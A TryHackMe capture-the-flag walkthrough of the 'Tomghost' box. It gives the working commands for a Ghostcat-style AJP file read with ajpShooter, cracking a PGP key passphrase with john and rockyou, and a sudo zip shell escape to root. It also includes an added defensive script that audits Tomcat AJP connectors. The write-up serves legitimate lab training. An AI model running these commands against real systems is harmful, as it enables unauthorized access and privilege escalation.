TomGhost Write-Up : TryHackMe Walk-through
--
Tomghost is a Linux machine deployed on TryHackMe. It is defined as an easy-level box.
We do not require any special access to solve this box. We just have to register on TryHackMe and continue from there.
Connect via VPN → Join the room → Start the machine.
Here, we are going to explore a few new tools and techniques in this walk-through. The IP assigned to me is 10.10.230.122. This may or may not be the same as yours, as it is dynamically allocated when the machine is started.
Let us first start with the initial reconnaissance.
Initial Reconnaissance
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
We can start enumerating the ports one by one.
Enumeration
http://10.10.230.122:8080
A web application (Apache Tomcat) is hosted on port 8080. After enumerating it for a good amount of time, we did not get any foothold.
Initial FootHold
Now enumerating port 8009, which is running Apache JServ (AJP).
Let us see if there are any publicly known exploits available for Apache JServ (Protocol v1.3).
Cloning this GitHub repository.
Referring to this article, we try to exploit the service using the command below.
python3 ajpShooter.py http://10.10.230.122:8080/ 8009 /WEB-INF/web.xml read
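The foothold above works because the AJP connector on port 8009 is reachable from the network. As an added defensive check (example code, not part of the original write-up), the script below parses a Tomcat server.xml and flags AJP connectors that are not bound to localhost or that enforce no shared secret. The server.xml content is a constructed sample, the secret value is a placeholder, and the `secretRequired`/`secret` attributes are assumed to be supported by the Tomcat version being audited.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml (not taken from the target machine). The connector on
# 8009 mirrors an unrestricted AJP configuration; the one on 8010 shows the hardened
# form. The secret value is a placeholder, not a real credential.
SAMPLE_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Connector port="8010" protocol="AJP/1.3" redirectPort="8443"
               address="127.0.0.1" secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"/>
  </Service>
</Server>
"""

WILDCARD_ADDRESSES = {"0.0.0.0", "::", "::0"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return [(port, [findings])] for each AJP connector in a Tomcat server.xml.

    A connector is flagged when it is reachable from other hosts (no ``address``
    attribute, or a wildcard address) and when no AJP shared secret is enforced
    (``secretRequired`` set to false, or no ``secret`` value). Only attributes
    present in the XML are inspected; the running server is not probed.
    """
    root = ET.fromstring(server_xml)
    results = []
    for connector in root.iter("Connector"):
        # Tomcat treats a missing protocol attribute as HTTP/1.1.
        protocol = connector.get("protocol", "HTTP/1.1")
        if "ajp" not in protocol.lower():
            continue
        findings = []
        address = connector.get("address")
        if address is None or address in WILDCARD_ADDRESSES:
            findings.append("reachable on all interfaces")
        secret_required = connector.get("secretRequired", "true").lower() == "true"
        if not secret_required or not connector.get("secret"):
            findings.append("no AJP shared secret")
        results.append((connector.get("port"), findings))
    return results


if __name__ == "__main__":
    for port, findings in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print(f"AJP connector on port {port}: {'; '.join(findings) or 'OK'}")
```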
The exploit output gives us SSH credentials, so we can easily log in.
We can go to the /home/merlin/ directory and simply capture the flag.
cd /home/merlin/
cat user.txt
Privilege Escalation
In the /home/skyfuck directory we can see two files with unusual names:
credential.pgp
tryhackme.asc
From the .pgp extension we can assume that it is a PGP file.
What is a PGP file?
Pretty Good Privacy (PGP) is an encryption system used for both sending encrypted emails and encrypting sensitive files. Since its invention back in 1991, PGP has become the de facto standard for email security.
The popularity of PGP is based on two factors. The first is that the system was originally available as freeware, and so spread rapidly among users who wanted an extra level of security for their email messages. The second is that since PGP uses both symmetric encryption and public-key encryption, it allows users who have never met to send encrypted messages to each other without exchanging private encryption keys.
Here, we can see that tryhackme.asc is a PGP private key. Let us try to crack its passphrase.
gpg2john ../tryhackme.asc > hash
Contents of the hash file produced by gpg2john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Now, to decrypt the credential.pgp file, we need to enter the following commands.
gpg --import tryhackme.asc
gpg --decrypt credential.pgp
When running the decrypt command, gpg asks for a passphrase, which is the one we obtained by cracking the hash.
Now we log in as merlin using the password obtained from the decrypted file.
su merlin
Now we try to escalate privileges from merlin to root.
sudo -l
/usr/bin/zip can be used to escalate privileges
by running the commands below:
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
ROOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOTED!!!